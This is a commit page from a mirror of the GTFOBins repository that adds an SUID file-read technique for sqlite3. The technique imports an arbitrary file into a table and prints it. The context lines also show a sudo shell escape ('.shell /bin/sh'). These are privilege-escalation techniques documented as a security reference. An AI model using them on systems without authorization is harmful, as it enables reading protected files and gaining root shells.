mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 02:38:43 +01:00 
			
		
		
		
	Add SUID [file read] category to sqlite3
This commit is contained in:
		@@ -14,6 +14,14 @@ functions:
 | 
				
			|||||||
        .import $LFILE t
 | 
					        .import $LFILE t
 | 
				
			||||||
        SELECT * FROM t;
 | 
					        SELECT * FROM t;
 | 
				
			||||||
        EOF
 | 
					        EOF
 | 
				
			||||||
 | 
					  suid:
 | 
				
			||||||
 | 
					    - code: |
 | 
				
			||||||
 | 
					        LFILE=file_to_read
 | 
				
			||||||
 | 
					        sqlite3 << EOF
 | 
				
			||||||
 | 
					        CREATE TABLE t(line TEXT);
 | 
				
			||||||
 | 
					        .import $LFILE t
 | 
				
			||||||
 | 
					        SELECT * FROM t;
 | 
				
			||||||
 | 
					        EOF
 | 
				
			||||||
  sudo:
 | 
					  sudo:
 | 
				
			||||||
    - code: sudo sqlite3 /dev/null '.shell /bin/sh'
 | 
					    - code: sudo sqlite3 /dev/null '.shell /bin/sh'
 | 
				
			||||||
  limited-suid:
 | 
					  limited-suid:
 | 
				
			||||||
 
 | 
				
			|||||||
		Reference in New Issue
	
	Block a user